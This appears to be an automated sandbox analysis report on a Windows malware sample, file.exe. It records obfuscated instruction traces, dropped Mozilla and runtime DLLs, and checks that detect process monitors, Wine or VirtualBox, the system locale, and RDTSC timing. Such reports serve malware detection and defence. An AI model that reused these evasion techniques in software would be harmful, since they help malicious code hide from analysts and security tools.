Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3C89B push eax; mov dword ptr [esp], 688F8816h 0_2_00D3C929
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3C89B push edi; mov dword ptr [esp], ebx 0_2_00D3C97E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3C89B push ebp; mov dword ptr [esp], edx 0_2_00D3C9A3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3C89B push ebp; mov dword ptr [esp], 56047201h 0_2_00D3C9F4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3C89B push ebx; mov dword ptr [esp], edx 0_2_00D3CA0E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3C89B push esi; mov dword ptr [esp], 50A86E1Ch 0_2_00D3CA12
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3C89B push ecx; mov dword ptr [esp], edx 0_2_00D3CA53
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3C89B push 34509D17h; mov dword ptr [esp], eax 0_2_00D3CADB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3C89B push ecx; mov dword ptr [esp], edi 0_2_00D3CB0F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3C89B push ecx; mov dword ptr [esp], esi 0_2_00D3CB4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3C89B push 0E6E3076h; mov dword ptr [esp], eax 0_2_00D3CB8D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3C89B push 53A07CB4h; mov dword ptr [esp], ebp 0_2_00D3CBA3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3C89B push edi; mov dword ptr [esp], ebx 0_2_00D3CBE7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3C89B push eax; mov dword ptr [esp], edx 0_2_00D3CC05
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3C89B push edi; mov dword ptr [esp], 36ED59FFh 0_2_00D3CC09
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3C89B push ecx; mov dword ptr [esp], esi 0_2_00D3CC68
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3C89B push edx; mov dword ptr [esp], 1C6E5185h 0_2_00D3CCAE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3C89B push edx; mov dword ptr [esp], eax 0_2_00D3CD4C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3C89B push edi; mov dword ptr [esp], ebp 0_2_00D3CE36
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3C89B push ebx; mov dword ptr [esp], 0DC68C68h 0_2_00D3CE4F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3C89B push 12BFA89Eh; mov dword ptr [esp], ebp 0_2_00D3CE79
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3C89B push 53BB640Eh; mov dword ptr [esp], ecx 0_2_00D3CF78
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3C89B push eax; mov dword ptr [esp], 013B69A0h 0_2_00D3CF9B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00D3C89B push 40038F33h; mov dword ptr [esp], esi 0_2_00D3D032
Source: file.exe Static PE information: section name: buyyxrmv entropy: 7.953408646972678
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00989860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00989860

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking locale)
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4750F second address: D4751B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4751B second address: D4751F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D46608 second address: D46612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F8CE4DC41A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D46612 second address: D46616 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D46616 second address: D4664B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE4DC41B7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8CE4DC41B6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4664B second address: D4664F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4664F second address: D4667F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e pushad 0x0000000f jmp 00007F8CE4DC41B1h 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F8CE4DC41ADh 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4667F second address: D46689 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8CE470D04Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D46C07 second address: D46C0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D46C0B second address: D46C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D46C11 second address: D46C2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8CE4DC41B6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D46D81 second address: D46DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007F8CE470D04Ah 0x0000000b pop edi 0x0000000c jmp 00007F8CE470D055h 0x00000011 popad 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007F8CE470D046h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D46DB1 second address: D46DD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F8CE4DC41A6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D488CE second address: D488F8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 xor dword ptr [esp], 43BFA121h 0x0000000e mov ecx, 4393D062h 0x00000013 lea ebx, dword ptr [ebp+1244A699h] 0x00000019 jns 00007F8CE470D047h 0x0000001f clc 0x00000020 push eax 0x00000021 je 00007F8CE470D054h 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48957 second address: D489DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a clc 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F8CE4DC41A8h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 call 00007F8CE4DC41A9h 0x0000002c jns 00007F8CE4DC41B2h 0x00000032 push eax 0x00000033 jmp 00007F8CE4DC41B5h 0x00000038 mov eax, dword ptr [esp+04h] 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F8CE4DC41AEh 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D489DF second address: D48A07 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jnp 00007F8CE470D054h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48A07 second address: D48A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48A0B second address: D48A22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D053h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48A22 second address: D48AB5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F8CE4DC41ACh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c mov ecx, dword ptr [ebp+122D2D10h] 0x00000012 push 00000003h 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F8CE4DC41A8h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e mov dword ptr [ebp+122D331Ah], edx 0x00000034 and dx, D712h 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push esi 0x0000003e call 00007F8CE4DC41A8h 0x00000043 pop esi 0x00000044 mov dword ptr [esp+04h], esi 0x00000048 add dword ptr [esp+04h], 0000001Ch 0x00000050 inc esi 0x00000051 push esi 0x00000052 ret 0x00000053 pop esi 0x00000054 ret 0x00000055 mov ecx, dword ptr [ebp+122D2B60h] 0x0000005b push 00000003h 0x0000005d push eax 0x0000005e mov dword ptr [ebp+122D333Eh], ecx 0x00000064 pop edi 0x00000065 push D5754DFBh 0x0000006a push eax 0x0000006b push edx 0x0000006c jl 00007F8CE4DC41ACh 0x00000072 jg 00007F8CE4DC41A6h 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48AB5 second address: D48AC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8CE470D04Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48AC3 second address: D48B31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 15754DFBh 0x0000000f mov dword ptr [ebp+122D3304h], ecx 0x00000015 sub di, D817h 0x0000001a lea ebx, dword ptr [ebp+1244A6A2h] 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007F8CE4DC41A8h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 0000001Ch 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a or ecx, 31635F76h 0x00000040 xchg eax, ebx 0x00000041 jnp 00007F8CE4DC41BDh 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48B31 second address: D48B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48B38 second address: D48B3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48B3E second address: D48B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48B98 second address: D48BAF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8CE4DC41ACh 0x00000008 jo 00007F8CE4DC41A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48BAF second address: D48BB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48BB3 second address: D48BBD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8CE4DC41A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D48CB6 second address: D48CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D678A8 second address: D678BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8CE4DC41ACh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D67A40 second address: D67A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D67A4D second address: D67A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D67A51 second address: D67A69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D050h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D67A69 second address: D67A72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D67C16 second address: D67C37 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F8CE470D04Eh 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8CE470D04Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D67C37 second address: D67C3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D68050 second address: D68054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6818C second address: D68192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D68192 second address: D681AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8CE470D04Bh 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D681AA second address: D681C2 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8CE4DC41A6h 0x00000008 jne 00007F8CE4DC41A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007F8CE4DC41A6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D681C2 second address: D681CC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8CE470D046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6850D second address: D68513 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D68513 second address: D68517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D69423 second address: D6942F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8CE4DC41A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6942F second address: D69447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE470D053h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6F1B3 second address: D6F1B8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6F692 second address: D6F698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6F82F second address: D6F834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6F834 second address: D6F848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8CE470D050h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6E6F9 second address: D6E700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6E700 second address: D6E70A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8CE470D04Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D72DA8 second address: D72DB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41AAh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D72DB7 second address: D72DBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38C99 second address: D38CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE4DC41AAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38CA7 second address: D38CB1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8CE470D046h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38CB1 second address: D38CBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38CBF second address: D38CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8CE470D046h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38CCB second address: D38CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8CE4DC41B7h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38CE7 second address: D38CED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38CED second address: D38CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D38CF3 second address: D38D16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D050h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnc 00007F8CE470D046h 0x00000010 jo 00007F8CE470D046h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D762D7 second address: D762EC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8CE4DC41A6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D76476 second address: D76492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F8CE470D054h 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D767BD second address: D767C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D767C2 second address: D767EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F8CE470D04Ch 0x0000000b ja 00007F8CE470D046h 0x00000011 popad 0x00000012 jp 00007F8CE470D048h 0x00000018 pushad 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jg 00007F8CE470D048h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D76956 second address: D7695B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7695B second address: D76961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D76961 second address: D76987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8CE4DC41A6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d js 00007F8CE4DC41B2h 0x00000013 jns 00007F8CE4DC41A6h 0x00000019 jl 00007F8CE4DC41A6h 0x0000001f pop edx 0x00000020 pop eax 0x00000021 push edi 0x00000022 push eax 0x00000023 push edx 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 rdtsc
